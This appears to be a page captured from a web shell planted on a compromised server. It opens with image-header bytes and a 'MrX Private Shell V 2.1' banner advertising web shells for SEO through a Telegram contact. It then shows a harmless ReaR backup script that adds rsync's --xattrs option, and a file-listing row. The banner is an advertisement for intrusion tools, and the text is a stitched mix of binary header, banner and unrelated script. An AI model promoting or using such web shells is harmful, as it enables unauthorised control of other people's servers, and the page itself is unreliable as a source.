����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# is RSYNC_SELINUX=1 : means we need --xattr option with rsync (SELinux was not disabled during backup)
# we need this special (hidden) variable because SELinux is never active in ReaR
[[ $RSYNC_SELINUX ]] && {
# if --xattrs is already set; no need to do it again
if ! grep -q xattrs <<< "${BACKUP_RSYNC_OPTIONS[*]}" ; then
BACKUP_RSYNC_OPTIONS+=( --xattrs )
fi
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 600_check_rsync_xattr.sh | File | 371 B | 0644 |
|